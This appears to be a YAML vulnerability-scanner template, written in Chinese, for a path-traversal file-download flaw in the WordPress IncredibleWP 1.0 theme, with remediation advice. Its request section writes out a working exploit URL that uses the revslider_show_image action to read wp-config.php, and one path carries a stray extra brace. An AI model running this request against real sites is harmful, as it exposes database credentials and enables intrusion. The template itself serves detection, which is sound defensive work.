id: Wordpress-IncredibleWP_Theme-ArbitraryFileDownload
info:
  name: wordpress IncredibleWP Theme_1.0_任意文件下载
  author:
  - l0ne1y
  description: |-
    WordPressTheme IncredibleWP 任意文件下载漏洞
    WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。

    wordpress IncredibleWP Theme_1.0存在路径遍历漏洞，该漏洞允许远程攻击者通过img参数读取系统中的任意文件。
  severity: high
  remediation: |-
    官方修复方案：
    1、建议用户到官方获取最新补丁或者最新版本程序：https://wordpress.org

    临时修复方案：
    1、过滤\".\"，使用户在url中不能回溯上级目录。
    2、正则匹配严格判断用户输入参数的格式，对用户传过来的文件名参数进行硬编码或统一编码，对文件类型进行白名单控制，对包含恶意字符或者空字符的参数进行拒绝。
    3、禁止系统提供目录遍历服务，如：php.ini配置open_basedir限定文件访问范围。
    4、文件路径保存至数据库，让用户提交文件对应ID下载文件。
    5、用户下载文件之前进行权限校验。
requests:
- matchers:
  - type: dsl
    condition: and
    dsl:
    - status_code_1==200 && status_code_2==200
    - contains(body_2,"<?php")
  matchers-condition: and
  path:
  - '{{BaseURL}}/wp-content/themes/incrediblewp/revslider/'
  - '{{BaseURL}}}/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php'
  method: GET
